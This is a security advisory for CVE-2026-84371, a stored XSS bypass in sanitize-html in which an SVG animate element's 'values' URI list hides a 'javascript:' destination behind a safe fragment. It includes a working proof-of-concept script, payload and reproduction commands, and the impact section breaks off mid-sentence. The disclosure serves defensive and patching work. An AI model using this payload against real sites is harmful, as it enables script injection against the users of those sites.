CVE-2026-84371
### Summary When SVG animation is allowed, `attributeName="href"` makes `values` a list of URL destinations. `sanitize-html` accepts a list that starts with a safe fragment even when `values` is explicitly scheme-checked, allowing a later `javascript:` destination to execute when the sanitized link is activated. ### Details `index.js:371-383` validates each attribute as one flat URL. It does not recognize that `attributeName="href"` gives the sibling `values` attribute SMIL URI-list semantics. For `values="#safe;javascript:..."`, the leading fragment passes the flat check and the complete list is retained. ### PoC This was reproduced with `[email protected]` and Chromium 150.0.7871.124. The configuration adds SVG animation to the defaults and applies the existing scheme policy to `values`; it does not allow `javascript:`. Save this as `poc.js`: ```js const sanitize = require('sanitize-html'); const input = `<svg><a><animate attributeName="href" values="#safe;javascript:alert('XSS')" dur=".01s" fill="freeze"></animate><text y="30">Click me</text></a></svg>`; const output = sanitize(input, { allowedTags: sanitize.defaults.allowedTags.concat(['svg', 'animate', 'text']), allowedAttributes: { ...sanitize.defaults.allowedAttributes, animate: ['attributename', 'values', 'dur', 'fill'], text: ['y'] }, allowedSchemesAppliedToAttributes: sanitize.defaults.allowedSchemesAppliedToAttributes.concat(['values']) }); console.log(output); ``` Install and run it, then open `poc.html` and click `Click me`: ```sh npm install [email protected] node poc.js > poc.html ``` The output retains the `javascript:` entry, and clicking the sanitized SVG displays `XSS`. With `input` changed to `<a href="javascript:alert(1)">control</a>`, the same configuration removes `href`. ### Impact In an application that accepts attacker-authored SVG animation, the attacker can store this payload without scripts or event handlers. A victim who activates the sanitized link
Properties
- ghsa_id
- GHSA-g8qq-57p8-ggw5
- severity
- medium
- summary
- ApostropheCMS: Stored XSS via SVG SMIL URI-list scheme-policy bypass
- cvss_score
- 5.4
- cve_id
- CVE-2026-84371
- cvss_vector
- CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- is_ghsa_only
- false
- ghsa_published
- 2026-09-01T21:20:01Z
- source_url
- https://github.com/advisories/GHSA-g8qq-57p8-ggw5
- ghsa_updated
- 2026-09-01T21:21:20Z
Related Entities (4)
VULNERABLE_TO (1)
AFFECTS (1)
HAS_WEAKNESS (1)
REPORTED_BY (1)
Explore deeper with Ninja Signal's threat intelligence graph